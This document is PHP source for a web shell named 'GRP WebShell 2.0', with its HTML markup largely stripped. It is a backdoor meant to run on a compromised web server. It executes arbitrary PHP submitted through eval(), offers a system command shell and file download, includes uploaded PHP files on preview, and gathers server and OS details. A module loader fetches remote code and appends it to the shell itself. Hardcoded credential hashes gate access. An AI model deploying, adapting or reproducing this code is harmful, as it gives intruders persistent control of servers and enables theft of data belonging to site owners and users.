"File browser", "mysql" => "MySQL"); // Script version $script_release = "GRP WebShell 2.0 release build 2018 (C)2006,Great"; // Authorization $name='63191e4ece37523c9fe6bb62a5e64d45'; $pass='47ce56ef73da9dec757ef654e6aa1ca1'; $caption="Enter your login and password"; if ($auth && (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER'])!=$name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW'])!=$pass)) { header("WWW-Authenticate: Basic realm=\"$caption\""); header("HTTP/1.0 401 Unauthorized"); exit("

Unauthorized access

"); } if($errors) error_reporting(E_ALL&~E_NOTICE); else error_reporting(0); // Strip slashes if(get_magic_quotes_gpc()) { foreach(array("_POST", "_GET", "_FILES", "_COOKIE") as $ar) foreach($GLOBALS[$ar] as $k=>$v) $GLOBALS[$ar][$k] = stripslashes($v); } // Useful functions // Print post form function post_form($name, $params, $a="", $b="") { static $i=0; echo "
\n"; foreach($params as $n=>$v) echo "\n"; echo "$a$name$b
\n"; $i++; } // Print post form without confirmation link function post_empty_form($params) { static $i=0; echo "
\n"; foreach($params as $n=>$v) echo "\n"; echo "
\n"; $i++; return $i-1; } // Print single confirmation link function submit_empty_form($i, $name) { echo "$name"; } // Print single confirmation link with a confirmation message box function confirm_empty_form($i, $name, $msg) { echo "$name"; } // Redirect to URL $to function redirect($to) { echo ""; } // Get string containing file permissions in the form 'lrwxrwxrwx' function filesperms($file) { $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } // Get string contaning file modification time function filesmtime($file) { return date ("d M Y H:i:s", filemtime($file)); } function headers() { return "{$_SERVER['REQUEST_METHOD']} {$_SERVER['PHP_SELF']} {$_SERVER['SERVER_PROTOCOL']}\\n Accept: {$_SERVER['HTTP_ACCEPT']}\\n Accept-Charset: {$_SERVER['HTTP_ACCEPT_CHARSET']}\\n Accept-Encoding: {$_SERVER['HTTP_ACCEPT_ENCODING']}\\n Accept-Language: {$_SERVER['HTTP_ACCEPT_LANGUAGE']}\\n Cache-Control: {$_SERVER['HTTP_CACHE_CONTROL']}\\n Connection: {$_SERVER['HTTP_CONNECTION']}\\n Host: {$_SERVER['HTTP_HOST']}\\n User-Agent: {$_SERVER['HTTP_USER_AGENT']}\\n "; } if($_POST['act']=='toolz' && $_POST['subact']=='phpinfo') die(phpinfo()); if($_POST['act']=='downfile') { $curdir = $_POST['curdir']; $file = $_POST['file']; if(!file_exists($curdir.'/'.$file)) die("Cannot find file ".$curdir.'/'.$file); if(!is_file($curdir.'/'.$file)) die($curdir.'/'.$file." is not a regular file"); Header("Content-Type: application/x-octet-stream"); Header("Content-Disposition: attachement;filename=".$file); die(join('', file($curdir.'/'.$file))); } if($_POST['act']=='preview') { chdir($_POST['curdir']); if(!file_exists($_POST['file'])) die("Can't find file"); $p=explode(".",$_POST['file']); $ext=strtolower($p[count($p)-1]); if(in_array($ext, array('png','jpg','jpeg','bmp','gif','tiff','pcx'))) Header("Content-Type: image/$ext"); elseif(in_array($ext, array('htm', 'html','plg'))) Header("Content-Type: text/html"); elseif(in_array($ext, array('php'))) { include($_POST['file']); die;} else Header("Content-Type: text/plain"); @readfile($_POST['file']); die; } //--------------------------------- // Headers //--------------------------------- ?> <?php echo $script_release;?>
"; post_form("Shell", array(), "", " |"); $mod_loaded = array(); foreach($modules as $module=>$name) { if(function_exists("mod_".$module)) { echo "
"; post_form($name, array("act" => $module), "", " |"); $mod_loaded[] = $module; } } echo ""; post_form("Toolz", array("act" => "toolz")); echo "
       
"; echo "Modules installed:   "; $first = 1; foreach($mod_loaded as $module) { if(!$first) echo ", "; if($module==$_POST['act']) echo "".$module.""; else echo $module; $first=0; } if($first==1) echo "None"; ?> "; ?>

"; } } echo "
Server information
Safe Mode  On
"; } else { echo "Operating system  "; $ver = exec("ver"); if(substr($ver, 0, 9) == "Microsoft") { echo $ver; $os = "win"; } else { $id = exec("id"); if(substr($id, 0, 3) == "uid") { echo exec("uname -srn"); $os = "nix"; } else echo "Unknown, not a Windows "; } if($os == "nix") { echo "
id  ".exec("id")."
Server software  {$_SERVER['SERVER_SOFTWARE']}"; if($os == "nix") { $pwd = exec("pwd"); $defcmd = "ls -liaF"; } elseif($os == "win") { $pwd = exec("cd"); $defcmd = "dir"; } if(empty($pwd)) $pwd = getcwd(); ?>
Client information
Client's IP  
Client's browser  

Tools

"toolz", "subact" => "phpinfo")); $n2 = post_empty_form(array("act" => "toolz", "subact" => "phpcode")); ?>
Append <pre> tags

"; if(isset($_POST['go'])) { echo "

Result is:
"; if($_POST['pre']=="on") { echo "

";
      eval($_POST['code']);
      echo "
"; } else echo eval($_POST['code']); } } ?> Module loader"; if($_POST['subact']=='autoload') { $mod = join('', file($modules_base."mod_".$_POST['module'].".txt")); if($mod===false) die("Module is unavailable"); //echo "Module:
"; $parts = explode('/', $_SERVER['PHP_SELF']); $name = $parts[count($parts)-1]; // Backup copy($name, "~".$name); $f = fopen("grp_repair.php", "w"); if($f) { $crlf = "\r\n"; fwrite($f, ''.""); fclose($f); $repair=1; } else $repair=0; $sh = fopen($name, "a+") or die("Can't open ".$name." to append module");; fwrite($sh, $mod); fclose($sh); echo "Module installed successfully
WARNING! Shell file has been backuped. If you'll have problems with installed module, you can "; if($repair) echo "run 'grp_repair.php' to forget changes"; else echo "backup file manually from '~".$name."' (shell was unable to create self-repairing module)"; echo "
You'll be automatically redirected in 3 seconds"; } else { echo "Supported modules are: "; $first = 1; foreach($modules as $module=>$name) { if(!$first) echo ", "; echo $name." (".$module.")"; $first=0; } if($first==1) echo "None"; echo "
Modules base load URL: $modules_base

Modules can be installed: (Ready, Failure)
"; foreach($modules as $module=>$name) { $mod_form[$module] = post_empty_form(array('act' => 'load_modules', 'subact' => 'autoload', 'module' => $module)); } echo ""; foreach($modules as $module=>$name) { $pre = ""; $post = ""; $mod = @join('', @file($modules_base."mod_".$module.".txt")); if(!preg_match("#function mod_#i", $mod)) $pre = ""; echo ""; } echo "
".$pre.$name." (".$module.")".$post."[SOURCE]"; if(function_exists("mod_".$module)) echo "[ALREADY INSTALLED]"; elseif($pre == "") submit_empty_form($mod_form[$module], "[INSTALL]"); else echo "[CAN'T INSTALL]"; echo "
"; } } // Shell else { // First we check if there has been asked for a working directory if (!empty($work_dir)) { // A workdir has been asked for if (!empty($command)) { if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) { // We try and match a cd command if ($regs[1][0] == '/') { $new_dir = $regs[1]; // 'cd /something/...' } else { $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...' } if (file_exists($new_dir) && is_dir($new_dir)) { $work_dir = $new_dir; } unset($command); } } } unset($curdir); if($safe == 1) { die("Safe mode is turned On! Command line is unavailable"); } if(isset($_POST["curdir"])) $curdir = $_POST["curdir"]; else $curdir = $pwd; if($os == "win") $curdir = str_replace("/", "\\", $curdir); ?>

Command: "> Set default []
Disable stderr-grabbing?>
Working directory: Restore as home directory []